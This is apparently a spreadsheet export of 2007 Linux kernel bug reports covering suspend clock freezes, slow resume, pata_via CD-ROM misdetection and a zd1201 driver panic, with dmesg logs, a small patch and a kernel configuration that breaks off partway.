    <t>Hello, whenever i suspend, the kernel clock is frozen. Last night i suspend at 01H10 and this morning i've resume at 11H30 and now: - date displays 02H09 - openntp reports "ntpd[1853]: adjusting local clock by 35160.707563s" - hwclock displays "Sun Oct 14 11:57:17 2007 -0.420801 seconds" - messages displays Oct 14 01:10:45 ibook gnome-power-manager: (benoit) Mise en veille de l'ordinateur car l'utilisateur a cliqué sur mise en veille à partir du me nu de la zone de notification Oct 14 01:10:45 ibook kernel: [97353.206739] ohci_hcd 0001:10:1a.0: Unlink after no-IRQ? Controller is probably using the wrong IRQ. Oct 14 01:10:47 ibook kernel: [97354.933626] eth0: suspending, WakeOnLan disabled Oct 14 01:10:47 ibook kernel: [97355.026822] bcm43xx: Suspending... Oct 14 01:10:47 ibook kernel: [97355.040032] bcm43xx: Device suspended. Oct 14 01:10:47 ibook kernel: [97355.041767] uninorth-agp: disabling AGP on device 0000:00:10.0 Oct 14 01:10:47 ibook kernel: [97355.041788] uninorth-agp: disabling AGP on bridge 0000:00:0b.0 Oct 14 01:10:49 ibook kernel: [97356.255702] agpgart: Putting AGP V2 device at 0000:00:0b.0 into 4x mode Oct 14 01:10:49 ibook kernel: [97356.255725] agpgart: Putting AGP V2 device at 0000:00:10.0 into 4x mode Oct 14 01:10:49 ibook kernel: [97356.517550] bcm43xx: Resuming... Oct 14 01:10:49 ibook kernel: [97356.537875] PCI: Enabling device 0001:10:12.0 (0000 -&gt; 0002) Oct 14 01:10:49 ibook kernel: [97356.539876] bcm43xx: Device resumed. Oct 14 01:10:49 ibook kernel: [97356.556710] PCI: Enabling device 0001:10:1b.0 (0000 -&gt; 0002) Oct 14 01:10:49 ibook kernel: [97356.570040] PCI: Enabling device 0001:10:1b.1 (0000 -&gt; 0002) Oct 14 01:10:49 ibook kernel: [97356.583380] PCI: Enabling device 0001:10:1b.2 (0000 -&gt; 0002) Oct 14 01:10:50 ibook kernel: [97357.600070] eth0: resuming Oct 14 01:10:51 ibook kernel: [97358.688581] hda: Enabling Ultra DMA 5 Oct 14 01:10:51 ibook kernel: [97358.755141] hdc: Enabling MultiWord DMA 2 Oct 14 01:10:52 ibook gnome-power-manager: (benoit) Reprise de l'ordinateur Oct 14 01:10:52 ibook kernel: [97359.542623] agpgart: Putting AGP V2 device at 0000:00:0b.0 into 4x mode Oct 14 01:10:52 ibook kernel: [97359.542657] agpgart: Putting AGP V2 device at 0000:00:10.0 into 4x mode Oct 14 01:10:52 ibook kernel: [97359.542729] [drm] Loading R200 Microcode Oct 14 01:10:52 ibook kernel: [97359.581839] adb: starting probe task... Oct 14 01:10:52 ibook kernel: [97359.849167] ADB keyboard at 2, handler 1 Oct 14 01:10:52 ibook kernel: [97359.865454] ADB mouse at 3, handler set to 4 (trackpad) Oct 14 01:10:52 ibook kernel: [97359.926422] adb: finished probe task... Oct 14 01:10:52 ibook kernel: [97360.066812] eth0: Link is up at 100 Mbps, full-duplex. Oct 14 01:10:52 ibook kernel: [97360.066831] eth0: Pause is disabled I can reproduce 100%</t>
  </si>
  <si>
    <t>Resume form memory suspend causes about a half a minute wait</t>
  </si>
  <si>
    <t>v2.6.23.1</t>
  </si>
  <si>
    <t>2007-10-14 07:16 UTC</t>
  </si>
  <si>
    <t>Ciprian Dorin Craciun</t>
  </si>
  <si>
    <t>2009-04-02 04:50 UTC</t>
  </si>
  <si>
    <t>acpi_ec</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: v2.6.22.9 Distribution: Debian Etch Hardware Environment: IBM ThinkPad T43. The output of lspci is attached. Problem Description: When my laptop resumes it takes a lot of time, about half a minute to resume. I watched the timings in the dmesg output (attached) and it seems it hangs either at the souncard setup or the SATA controller. (I'm not an expert, I just guessed that based on dmesg, so I might be wrong...) The problem is at the lines: [ 0.275398] PCI: Setting latency timer of device 0000:00:1e.2 to 64 [ 18.437412] PM: Writing back config space on device 0000:00:1f.2 at offset 1 (was 2b00005, writing 2b80005) And those PCI's corespond to: 00:1e.2 Multimedia audio controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) AC'97 Audio Controller (rev 03) 00:1f.2 IDE interface: Intel Corporation 82801FBM (ICH6M) SATA Controller (rev 03) I must add that I haven't encountered this problem with any of the previous stable kernels. The last one I have used was v2.6.22.9. And the difference of the two configs is not essential. Thanks!</t>
  </si>
  <si>
    <t>[pata_via probe]: CD-Rom devices are being recognized as DISKs when using pata driver</t>
  </si>
  <si>
    <t>2.6.20+, up to 2.6.23</t>
  </si>
  <si>
    <t>2007-10-17 11:12 UTC</t>
  </si>
  <si>
    <t>Michael Tokarev</t>
  </si>
  <si>
    <t>2008-02-16 12:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: I didn't try previous versions. It worked flawlessly with IDE drivers, not PATA. Distribution: n/a Hardware Environment: several different machines, but the two things in common so far: chipset VIA VT8633 [Apollo Pro266] IDE: VIA VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) Software Environment: Vanilla kernels with a minimal set of (feature) patches, like unionfs and squashfs. Problem Description: IDE CD-ROM drive is being recognized as DISK when using pata_via instead of via82cxxx driver. When using ol'good IDE driver, everything works as expected. Here's the relevant parts of dmesg: (2.6.20, one machine) loading module pata_via SCSI subsystem initialized libata version 2.00 loaded. pata_via 0000:00:11.1: version 0.2.1 ata1: PATA max UDMA/100 cmd 0x1F0 ctl 0x3F6 bmdma 0x1000 irq 14 ata2: PATA max UDMA/100 cmd 0x170 ctl 0x376 bmdma 0x1008 irq 15 scsi0 : pata_via ata1.00: ATA-6, max UDMA/100, 156301488 sectors: LBA48 ata1.00: ata1: dev 0 multi count 16 ata1.01: ATAPI, max UDMA/33 ata1.00: configured for UDMA/100 ata1.01: configured for UDMA/33 scsi1 : pata_via ata2.00: ATA-6, max UDMA/100, 156301488 sectors: LBA48 ata2.00: ata2: dev 0 multi count 16 ata2.01: ATAPI, max MWDMA0, CDB intr ata2.00: configured for UDMA/100 ata2.01: failed to set xfermode (err_mask=0x1) ata2.01: limiting speed to PIO3 ata2: failed to recover some devices, retrying in 5 secs ata2.00: configured for UDMA/33 ata2.01: configured for PIO3 scsi 0:0:0:0: Direct-Access ATA ST380011A 8.01 PQ: 0 ANSI: 5 scsi 0:0:1:0: Direct-Access PQ: 0 ANSI: 5 scsi 1:0:0:0: Direct-Access ATA ST380011A 8.01 PQ: 0 ANSI: 5 scsi 1:0:1:0: Direct-Access IOMEGA ZIP 250 51.G PQ: 0 ANSI: 5 loading module sd_mod SCSI device sda: 156301488 512-byte hdwr sectors (80026 MB) sda: Write Protect is off sda: Mode Sense: 00 3a 00 00 SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 sda4 &lt; sda5 sda6 sda7 &gt; sd 0:0:0:0: Attached scsi disk sda sd 0:0:1:0: Attached scsi disk sdb SCSI device sdc: 156301488 512-byte hdwr sectors (80026 MB) sdc: Write Protect is off sdc: Mode Sense: 00 3a 00 00 SCSI device sdc: write cache: enabled, read cache: enabled, doesn't support DPO or FUA sdc: sdc1 sdc2 sdc3 sdc4 &lt; sdc5 sdc6 sdc7 &gt; sd 1:0:0:0: Attached scsi disk sdc sd 1:0:1:0: Attached scsi removable disk sdd Here's another machine, with the same chipset and with 2.6.23 kernel: loading module pata_via SCSI subsystem initialized libata version 2.21 loaded. pata_via 0000:00:11.1: version 0.3.2 scsi0 : pata_via scsi1 : pata_via ata1: PATA max UDMA/100 cmd 0x000101f0 ctl 0x000103f6 bmdma 0x00011000 irq 14 ata2: PATA max UDMA/100 cmd 0x00010170 ctl 0x00010376 bmdma 0x00011008 irq 15 ata1.00: ATA-6: ST380011A, 8.01, max UDMA/100 ata1.00: 156301488 sectors, multi 16: LBA48 ata1.01: ATA-6: ST380011A, 8.01, max UDMA/100 ata1.01: 156301488 sectors, multi 16: LBA48 ata1.00: configured for UDMA/100 ata1.01: configured for UDMA/100 ata2.00: ATAPI: FX4830T, R02E, max UDMA/33 ata2.01: ATAPI: IOMEGA ZIP 250 ATAPI, 51.G, max MWDMA0, CDB intr ata2.01: device is on DMA blacklist, disabling DMA ata2.00: configured for UDMA/33 ata2.01: configured for PIO3 scsi 0:0:0:0: Direct-Access ATA ST380011A 8.01 PQ: 0 ANSI: 5 scsi 0:0:1:0: Direct-Access ATA ST380011A 8.01 PQ: 0 ANSI: 5 scsi scan: INQUIRY result too short (5), using 36 scsi 1:0:0:0: Direct-Access PQ: 0 ANSI: 5 scsi 1:0:1:0: Direct-Access IOMEGA ZIP 250 51.G PQ: 0 ANSI: 5 loading module sd_mod sd 0:0:0:0: [sda] 156301488 512-byte hardware sectors (80026 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sda: sda1 sda2 sda3 sda4 &lt; sda5 sda6 sda7 &gt; sd 0:0:0:0: [sda] Attached SCSI disk sd 0:0:1:0: [sdb] 156301488 512-byte hardware sectors (80026 MB) sd 0:0:1:0: [sdb] Write Protect is off sd 0:0:1:0: [sdb] Mode Sense: 00 3a 00 00 sd 0:0:1:0: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA sdb: sdb1 sdb2 sdb3 sdb4 &lt; sdb5 sdb6 sdb7 &gt; sd 0:0:1:0: [sdb] Attached SCSI disk sd 1:0:0:0: [sdc] Attached SCSI disk sd 1:0:1:0: [sdd] Attached SCSI removable disk A slight difference in configuration: on the first machine, two disks are on first IDE channel, while CD-rom and ZIP drives are on the second; while on the second machine, the disks are "spread" across two channels. So in first case CD-Rom shares the IDE bus with a ZIP drive, while on second case it shares the bus with an IDE disk. As it is clear from the dmesg, sd_mod claims all IDE devices, including cdrom. Here's the output of hdparm -i with IDE module: Model=LTN483L, FwRev=ES13, SerialNo= Config={ SpinMotCtl Removeable DTR&lt;=5Mbs DTR&gt;10Mbs nonMagnetic } RawCHS=0/0/0, TrkSize=0, SectSize=0, ECCbytes=0 BuffType=unknown, BuffSize=0kB, MaxMultSect=0 (maybe): CurCHS=0/0/0, CurSects=0, LBA=yes, LBAsects=0 IORDY=on/off, tPIO={min:120,w/IORDY:120}, tDMA={min:120,rec:120} PIO modes: pio0 pio1 pio2 pio3 pio4 DMA modes: sdma0 sdma1 sdma2 mdma0 mdma1 mdma2 UDMA modes: udma0 udma1 *udma2 AdvancedPM=no P.S. Can't figure out how to "Assign" a bug when submitting. Alan asked to assign it to him. Also, I found no better place than to put the bug under IO/IDE category - this is not SATA and not SCSI, but not IDE either ;)</t>
  </si>
  <si>
    <t>2.6.23.1 / USB_ZD1201: Kernel panic with zd1201 driver</t>
  </si>
  <si>
    <t>2007-10-17 11:34 UTC</t>
  </si>
  <si>
    <t>bugzillakernelorg.aut</t>
  </si>
  <si>
    <t>2007-11-19 15:05 UTC</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: 2.6.23.1 / USB_ZD1201: Kernel panic with zd1201 driver [2.] Full description of the problem: The zd1201-driver (symbol: USB_ZD1201) triggers a kernel panic during initialization of the WLAN device, showing the following message: EIP: [&lt;e095e1d1&gt;] zd1201_usbrx+0x6e1/0xbb0 [zd1201] SS:ESP 0068:c0469d7c Kernel panic - not syncing: Fatal exception in interrupt According to the init output during bootup, the panic seems to occur right when the WLAN device receives an IP address from the DHCP-Server of the WLAN/DSL-Router. The WLAN device is (in my case) a 'Belkin F5D6051' based on the ZyDAS 1201 chip. As far as i know, the only recent change in 'drivers/net/wireless/zd1201.c' was done in patch-2.6.22, so the bug probably affects all kernel versions later than 2.6.21.7, but at least the ones i've tested (which are listed in the summary below). It also recently came up in some different distribution-specific forums/bugtrackers, so it does not seem to be specific to my machine/setup. A link to another report on this problem is included at the end of this report. Below is an extract of patch-2.6.22, showing that the lines 330 and 388 have been removed from 'drivers/net/wireless/zd1201.c'. I put those two lines back, which made things work as expected again; however, that is only meant as a hint, since i don't know why they were taken out or what other implications my change might have. patch-2.6.22, lines 586509-586528: {{{ diff --git a/drivers/net/wireless/zd1201.c b/drivers/net/wireless/zd1201.c index 6cb66a3..935b144 100644 --- a/drivers/net/wireless/zd1201.c +++ b/drivers/net/wireless/zd1201.c @@ -327,7 +327,6 @@ static void zd1201_usbrx(struct urb *urb) memcpy(skb_put(skb, 6), &amp;data[datalen-8], 6); memcpy(skb_put(skb, 2), &amp;data[datalen-24], 2); memcpy(skb_put(skb, len), data, len); - skb-&gt;dev = zd-&gt;dev; skb-&gt;dev-&gt;last_rx = jiffies; skb-&gt;protocol = eth_type_trans(skb, zd-&gt;dev); zd-&gt;stats.rx_packets++; @@ -385,7 +384,6 @@ static void zd1201_usbrx(struct urb *urb) memcpy(skb_put(skb, 2), &amp;data[6], 2); memcpy(skb_put(skb, len), data+8, len); } - skb-&gt;dev = zd-&gt;dev; skb-&gt;dev-&gt;last_rx = jiffies; skb-&gt;protocol = eth_type_trans(skb, zd-&gt;dev); zd-&gt;stats.rx_packets++; }}} Please note that all hardware information output in this report refers to the 2.6.23.1-kernel with a modified 'drivers/net/wireless/zd1201.c', as described above. The following is a summary of the tests i did (i played around with some config options related to wireless networking in all cases, getting the same results in all cases). Kernel 2.6.20, gentoo-patchset: module: works compiled-in: works Kernel 2.6.21.7, vanilla/unpatched: module: works compiled-in: works Kernel 2.6.22, gentoo-patchset: module: fails compiled-in: fails Kernel 2.6.23, vanilla/unpatched: module: fails compiled-in: fails Kernel 2.6.23.1, vanilla/unpatched: module: fails compiled-in: fails Kernel 2.6.23.1, w/ modified 'drivers/net/wireless/zd1201.c' (as described above): module: works compiled-in: works [3.] Keywords: drivers, networking, usb, wlan, wireless, zd1201 [4.] Kernel information [4.1.] Kernel version: Linux version 2.6.23.1 (root@neptun) (gcc version 4.1.2 (Gentoo 4.1.2 p1.0.1)) #6 Mon Oct 15 00:47:28 CEST 2007 [4.2.] Kernel .config file: linux/.config: {{{ # # Automatically generated make config: don't edit # Linux kernel version: 2.6.23.1 # Mon Oct 15 12:18:09 2007 # CONFIG_X86_32=y CONFIG_GENERIC_TIME=y CONFIG_GENERIC_CMOS_UPDATE=y CONFIG_CLOCKSOURCE_WATCHDOG=y CONFIG_GENERIC_CLOCKEVENTS=y CONFIG_GENERIC_CLOCKEVENTS_BROADCAST=y CONFIG_LOCKDEP_SUPPORT=y CONFIG_STACKTRACE_SUPPORT=y CONFIG_SEMAPHORE_SLEEPERS=y CONFIG_X86=y CONFIG_MMU=y CONFIG_ZONE_DMA=y CONFIG_QUICKLIST=y CONFIG_GENERIC_ISA_DMA=y CONFIG_GENERIC_IOMAP=y CONFIG_GENERIC_BUG=y CONFIG_GENERIC_HWEIGHT=y CONFIG_ARCH_MAY_HAVE_PC_FDC=y CONFIG_DMI=y CONFIG_DEFCONFIG_LIST="/lib/modules/$UNAME_RELEASE/.config" # # General setup # CONFIG_EXPERIMENTAL=y CONFIG_BROKEN_ON_SMP=y CONFIG_INIT_ENV_ARG_LIMIT=32 CONFIG_LOCALVERSION="" # CONFIG_LOCALVERSION_AUTO is not set CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_SYSVIPC_SYSCTL=y CONFIG_POSIX_MQUEUE=y CONFIG_BSD_PROCESS_ACCT=y # CONFIG_BSD_PROCESS_ACCT_V3 is not set # CONFIG_TASKSTATS is not set # CONFIG_USER_NS is not set # CONFIG_AUDIT is not set # CONFIG_IKCONFIG is not set CONFIG_LOG_BUF_SHIFT=14 # CONFIG_SYSFS_DEPRECATED is not set # CONFIG_RELAY is not set # CONFIG_BLK_DEV_INITRD is not set # CONFIG_CC_OPTIMIZE_FOR_SIZE is not set CONFIG_SYSCTL=y # CONFIG_EMBEDDED is not set CONFIG_UID16=y CONFIG_SYSCTL_SYSCALL=y CONFIG_KALLSYMS=y # CONFIG_KALLSYMS_EXTRA_PASS is not set CONFIG_HOTPLUG=y CONFIG_PRINTK=y CONFIG_BUG=y CONFIG_ELF_CORE=y CONFIG_BASE_FULL=y CONFIG_FUTEX=y CONFIG_ANON_INODES=y CONFIG_EPOLL=y CONFIG_SIGNALFD=y CONFIG_EVENTFD=y CONFIG_SHMEM=y CONFIG_VM_EVENT_COUNTERS=y CONFIG_SLAB=y # CONFIG_SLUB is not set # CONFIG_SLOB is not set CONFIG_RT_MUTEXES=y # CONFIG_TINY_SHMEM is not set CONFIG_BASE_SMALL=0 CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set # CONFIG_MODVERSIONS is not set # CONFIG_MODULE_SRCVERSION_ALL is not set CONFIG_KMOD=y CONFIG_BLOCK=y # CONFIG_LBD is not set # CONFIG_BLK_DEV_IO_TRACE is not set # CONFIG_LSF is not set # CONFIG_BLK_DEV_BSG is not set # # IO Schedulers # CONFIG_IOSCHED_NOOP=y CONFIG_IOSCHED_AS=y CONFIG_IOSCHED_DEADLINE=y CONFIG_IOSCHED_CFQ=y # CONFIG_DEFAULT_AS is not set # CONFIG_DEFAULT_DEADLINE is not set CONFIG_DEFAULT_CFQ=y # CONFIG_DEFAULT_NOOP is not set CONFIG_DEFAULT_IOSCHED="cfq" # # Processor type and features # CONFIG_TICK_ONESHOT=y CONFIG_NO_HZ=y CONFIG_HIGH_RES_TIMERS=y # CONFIG_SMP is not set CONFIG_X86_PC=y # CONFIG_X86_ELAN is not set # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_X86_ES7000 is not set # CONFIG_PARAVIRT is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUMM is not set # CONFIG_MCORE2 is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MCRUSOE is not set # CONFIG_MEFFICEON is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MGEODEGX1 is not set # CONFIG_MGEODE_LX is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_MVIAC7 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_X86_XADD=y CONFIG_RWSEM_XCHGADD_ALGORITHM=y # CONFIG_ARCH_HAS_ILOG2_U32 is not set # CONFIG_ARCH_HAS_ILOG2_U64 is not set CONFIG_GENERIC_CALIBRATE_DELAY=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y CONFIG_X86_TSC=y CONFIG_X86_CMOV=y CONFIG_X86_MINIMUM_CPU_FAMILY=4 CONFIG_HPET_TIMER=y # CONFIG_PREEMPT_NONE is not set CONFIG_PREEMPT_VOLUNTARY=y # CONFIG_PREEMPT is not set CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_X86_MCE_P4THERMAL is not set CONFIG_VM86=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_X86_REBOOTFIXUPS is not set # CONFIG_MICROCODE is not set # CONFIG_X86_MSR is not set # CONFIG_X86_CPUID is not set # # Firmware Drivers # # CONFIG_EDD is not set # CONFIG_DELL_RBU is not set # CONFIG_DCDBAS is not set # CONFIG_DMIID is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set CONFIG_PAGE_OFFSET=0xC0000000 # CONFIG_X86_PAE is not set CONFIG_ARCH_FLATMEM_ENABLE=y CONFIG_ARCH_SPARSEMEM_ENABLE=y CONFIG_ARCH_SELECT_MEMORY_MODEL=y CONFIG_ARCH_POPULATES_NODE_MAP=y CONFIG_SELECT_MEMORY_MODEL=y CONFIG_FLATMEM_MANUAL=y # CONFIG_DISCONTIGMEM_MANUAL is not set # CONFIG_SPARSEMEM_MANUAL is not set CONFIG_FLATMEM=y CONFIG_FLAT_NODE_MEM_MAP=y CONFIG_SPARSEMEM_STATIC=y CONFIG_SPLIT_PTLOCK_CPUS=4 # CONFIG_RESOURCES_64BIT is not set CONFIG_ZONE_DMA_FLAG=1 CONFIG_BOUNCE=y CONFIG_NR_QUICK=1 CONFIG_VIRT_TO_BUS=y # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # CONFIG_EFI is not set CONFIG_SECCOMP=y # CONFIG_HZ_100 is not set # CONFIG_HZ_250 is not set # CONFIG_HZ_300 is not set CONFIG_HZ_1000=y CONFIG_HZ=1000 # CONFIG_KEXEC is not set CONFIG_PHYSICAL_START=0x100000 # CONFIG_RELOCATABLE is not set CONFIG_PHYSICAL_ALIGN=0x100000 # CONFIG_COMPAT_VDSO is not set # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_PM_LEGACY is not set # CONFIG_PM_DEBUG is not set CONFIG_PM_SLEEP=y CONFIG_SUSPEND_UP_POSSIBLE=y CONFIG_SUSPEND=y CONFIG_HIBERNATION_UP_POSSIBLE=y # CONFIG_HIBERNATION is not set CONFIG_ACPI=y CONFIG_ACPI_SLEEP=y # CONFIG_ACPI_PROCFS is not set # CONFIG_ACPI_PROC_EVENT is not set # CONFIG_ACPI_AC is not set # CONFIG_ACPI_BATTERY is not set CONFIG_ACPI_BUTTON=y # CONFIG_ACPI_FAN is not set # CONFIG_ACPI_DOCK is not set CONFIG_ACPI_PROCESSOR=y CONFIG_ACPI_THERMAL=y # CONFIG_ACPI_ASUS is not set # CONFIG_ACPI_TOSHIBA is not set CONFIG_ACPI_BLACKLIST_YEAR=0 # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_SYSTEM=y CONFIG_X86_PM_TIMER=y # CONFIG_ACPI_CONTAINER is not set # CONFIG_ACPI_SBS is not set # CONFIG_APM is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GOMMCONFIG is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_MMCONFIG=y # CONFIG_PCIEPORTBUS is not set CONFIG_ARCH_SUPPORTS_MSI=y # CONFIG_PCI_MSI is not set CONFIG_HT_IRQ=y CONFIG_ISA_DMA_API=y # CONFIG_ISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set # # PCCARD (PCMCIA/CardBus) support # # CONFIG_PCCARD is not set # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_BINFMT_ELF=y # CONFIG_BINFMT_AOUT is not set CONFIG_BINFMT_MISC=y # # Networking # CONFIG_NET=y # # Networking options # CONFIG_PACKET=y # CONFIG_PACKET_MMAP is not set CONFIG_UNIX=y CONFIG_XFRM=y CONFIG_XFRM_USER=y # CONFIG_XFRM_SUB_POLICY is not set # CONFIG_XFRM_MIGRATE is not set CONFIG_NET_KEY=y # CONFIG_NET_KEY_MIGRATE is not set CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set CONFIG_IP_FIB_HASH=y # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_SYN_COOKIES is not set CONFIG_INET_AH=y CONFIG_INET_ESP=y CONFIG_INET_IPCOMP=y CONFIG_INET_XFRM_TUNNEL=y CONFIG_INET_TUNNEL=y CONFIG_INET_XFRM_MODE_TRANSPORT=y CONFIG_INET_XFRM_MODE_TUNNEL=y CONFIG_INET_XFRM_MODE_BEET=y CONFIG_INET_DIAG=y CONFIG_INET_TCP_DIAG=y # CONFIG_TCP_CONG_ADVANCED is not set CONFIG_TCP_CONG_CUBIC=y CONFIG_DEFAULT_TCP_CONG="cubic" # CONFIG_TCP_MD5SIG is not set CONFIG_IPV6=y # CONFIG_IPV6_PRIVACY is not set # CONFIG_IPV6_ROUTER_PREF is not set # CONFIG_IPV6_OPTIMISTIC_DAD is not set CONFIG_INET6_AH=y CONFIG_INET6_ESP=y CONFIG_INET6_IPCOMP=y # CONFIG_IPV6_MIP6 is not set CONFIG_INET6_XFRM_TUNNEL=y CONFIG_INET6_TUNNEL=y CONFIG_INET6_XFRM_MODE_TRANSPORT=y CONFIG_INET6_XFRM_MODE_TUNNEL=y CONFIG_INET6_XFRM_MODE_BEET=y # CONFIG_INET6_XFRM_MODE_ROUTEOPTIMIZATION is not set CONFIG_IPV6_SIT=y # CONFIG_IPV6_TUNNEL is not set # CONFIG_IPV6_MULTIPLE_TABLES is not set # CONFIG_NETWORK_SECMARK is not set # CONFIG_NETFILTER is not set # CONFIG_IP_DCCP is not set # CONFIG_IP_SCTP is not set # CONFIG_TIPC is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set # CONFIG_AF_RXRPC is not set # # Wireless # # CONFIG_CFG80211 is not set CONFIG_WIRELESS_EXT=y # CONFIG_MAC80211 is not set # CONFIG_IEEE80211 is not set # CONFIG_RFKILL is not set # CONFIG_NET_9P is not set # # Device Drivers # # # Generic Driver Options # CONFIG_STANDALONE=y CONFIG_PREVENT_FIRMWARE_BUILD=y CONFIG_FW_LOADER=y # CONFIG_SYS_HYPERVISOR is not set # CONFIG_CONNECTOR is not set # CONFIG_MTD is not set # CONFIG_PARPORT is not set CONFIG_PNP=y # CONFIG_PNP_DEBUG is not set # # Protocols # CONFIG_PNPACPI=y CONFIG_BLK_DEV=y # CONFIG_BLK_DEV_FD is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set # CONFIG_BLK_DEV_COW_COMMON is not set CONFIG_BLK_DEV_LOOP=y # CONFIG_BLK_DEV_CRYPTOLOOP is not set # CONFIG_BLK_DEV_NBD is not set # CONFIG_BLK_DEV_SX8 is not set # CONFIG_BLK_DEV_UB is not set # CONFIG_BLK_DEV_RAM is not set # CONFIG_CDROM_PKTCDVD is not set # CONFIG_ATA_OVER_ETH is not set # CONFIG_MISC_DEVICES is not set CONFIG_IDE=y CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_IDE_SATA is not set # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y # CONFIG_IDEDISK_MULTI_MODE is not set CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set CONFIG_BLK_DEV_IDEACPI=y # CONFIG_IDE_TASK_IOCTL is not set CONFIG_IDE_PROC_FS=y # # IDE chipset support/bugfixes # CONFIG_IDE_GENERIC=y # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_IDEPCI_PCIBUS_ORDER=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_BLK_DEV_GENERIC=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDEDMA_FORCED is not set # CONFIG_IDEDMA_ONLYDISK is not set # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_ATIIXP is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_CS5530 is not set # CONFIG_BLK_DEV_CS5535 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_JMICRON is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_IT8213 is not set # CONFIG_BLK_DEV_IT821X is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set 